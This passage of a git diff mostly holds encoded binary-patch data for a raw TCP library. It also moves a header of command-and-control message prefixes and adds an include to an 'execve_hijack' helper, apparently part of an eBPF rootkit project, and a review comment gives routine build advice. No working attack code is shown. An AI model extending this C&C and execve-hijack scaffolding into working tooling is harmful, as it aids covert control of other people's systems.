zIDuI-vcvY@J5`FDl>IytlKzX*_f^I&Nw2uJETtHI_s^MbJ2M?H?(wNZ z-RH|f{3O4p2f@*(Z9M4VI?j$h9POgln5=~Re|2fMMq9#q{<$6K=t`Jhme|aj8`VgF z=Oqrd65jo2+s#--Ao(sq&vjd+*;!M)4cU2pz~{*!3~WcJh-^c7=VG0E!H?2*f~Mg# z6!{Q*q4@hT)aR4EXZkvh6lT>BYC94BXAH50B;7)AUGd*0>UtSObzM;$j^-4CmLdaL eOL^b6duyaPO1lYSa4f}hM=`T_#GYt=8Tk)eGM6C$ delta 631 zcmX>yiFwWx<_UdlODq@|mRL*<6cO3Dg0GO-(#T+Pr?x)hkIgR&cQZ4#O=lr 
zeyJ~G_GI0%G^Ur+Chsl@nEa?r%vQ>y+jW9R=P{37TLvK50U}<2h}RN8nG4utnrl}u z@V6BF`~QD3cWE#a1HNl|8Ax*N4a zm&q!fE@HYsS2DQr3A8ae^Rjs~Gc(ID@vw6Mjgp#V<~R9QMAT-7t^`I-uri>^(~}RH ziElp8&B4O7mSys~I5EaAlOOhrOR=#6C4m5B8Z!`I0daspfOT?SyqJ^%n)EM-EQ1zU zn#qoJa$l?%W9??a3Hp4D-IE>XnR5n6L)3hj+&Isi=``4PlRwyLz?cH_HMlN7jg@Ac zoR(|G_GeT>MxS0JkK&asU7T diff --git a/src/ebpf/include/packet/c&c/c&c.h b/src/common/c&c.h similarity index 61% rename from src/ebpf/include/packet/c&c/c&c.h rename to src/common/c&c.h index 7fbec6b..b040b84 100644 --- a/src/ebpf/include/packet/c&c/c&c.h +++ b/src/common/c&c.h @@ -3,8 +3,7 @@ #define CC_PROT_SYN "CC_SYN" #define CC_PROT_ACK "CC_ACK" -#define CC_PROT_SYN_ACK "CC_SYN_ACK" -#define CC_PROT_SEPARATOR "#" +#define CC_PROT_MSG "CC_MSG#" #endif \ No newline at end of file diff --git a/src/helpers/execve_hijack.c b/src/helpers/execve_hijack.c index 78bbe41..840c4e3 100644 --- a/src/helpers/execve_hijack.c +++ b/src/helpers/execve_hijack.c @@ -9,6 +9,8 @@ #include #include +#include "lib/RawTCP.h" + int main(int argc, char* argv[]){ printf("Hello world from execve hijacker\n"); 
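Review bot: The c&c.h hunk removes `CC_PROT_SYN_ACK` and `CC_PROT_SEPARATOR` from a header that previously lived under src/ebpf/include, yet the diffstat lists no eBPF source change; if anything there still includes the old path or uses the removed macros, it will no longer build, so that side should be checked (or the removed names kept until it is migrated). The separator is now baked into the prefix, which deserves a comment so the next reader does not re-add one, e.g. `/* message prefix; the trailing '#' separates it from the text that follows */` above `#define CC_PROT_MSG "CC_MSG#"`. The file also still ends without a newline after `#endif` (`\ No newline at end of file`), which some compilers warn about; add one while touching the header.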
diff --git a/src/helpers/lib/libRawTCP_Lib.a b/src/helpers/lib/libRawTCP_Lib.a index 8bbefb908e492b8ea2a8a75e712e6d580e6a41c3..7662f7dd2640b30e6dc93938ae982d54a4a8c364 100644 GIT binary patch delta 465 zcmX9&QAm?f7`@-UUZ>ld|6=@`L+5*1{IAM66|F%UqXr$#c2=?Vi6P- zTc?*`&E>yh^p^j-^kA9~KKu`X^b%3gLlE>-MEG~d4t(eEecyp|YEQ-16H$5GZ50@^ z3dn{+Z(4yxaeDj|ZZuEu_%YO*!?thfnV=kA7AGi%PsI$);rPl`{^L3}moxabVjlMF zq+7%oE8lLhzPt4U*M+Y*jYq5d^by8|IOXlVn;FSn!a(T?cTRa!*TSB&oH4-+ zIDuI-vcvY@J5`FDl>IytlKzX*_f^I&Nw2uJETtHI_s^MbJ2M?H?(wNZ z-RH|f{3O4p2f@*(Z9M4VI?j$h9POgln5=~Re|2fMMq9#q{<$6K=t`Jhme|aj8`VgF z=Oqrd65jo2+s#--Ao(sq&vjd+*;!M)4cU2pz~{*!3~WcJh-^c7=VG0E!H?2*f~Mg# z6!{Q*q4@hT)aR4EXZkvh6lT>BYC94BXAH50B;7)AUGd*0>UtSObzM;$j^-4CmLdaL eOL^b6duyaPO1lYSa4f}hM=`T_#GYt=8Tk)eGM6C$ delta 631 zcmX>yiFwWx<_UdlODq@|mRL*<6cO3Dg0GO-(#T+Pr?x)hkIgR&cQZ4#O=lr zeyJ~G_GI0%G^Ur+Chsl@nEa?r%vQ>y+jW9R=P{37TLvK50U}<2h}RN8nG4utnrl}u z@V6BF`~QD3cWE#a1HNl|8Ax*N4a zm&q!fE@HYsS2DQr3A8ae^Rjs~Gc(ID@vw6Mjgp#V<~R9QMAT-7t^`I-uri>^(~}RH ziElp8&B4O7mSys~I5EaAlOOhrOR=#6C4m5B8Z!`I0daspfOT?SyqJ^%n)EM-EQ1zU zn#qoJa$l?%W9??a3Hp4D-IE>XnR5n6L)3hj+&Isi=``4PlRwyLz?cH_HMlN7jg@Ac zoR(|G_GeT>MxS0JkK&asU7T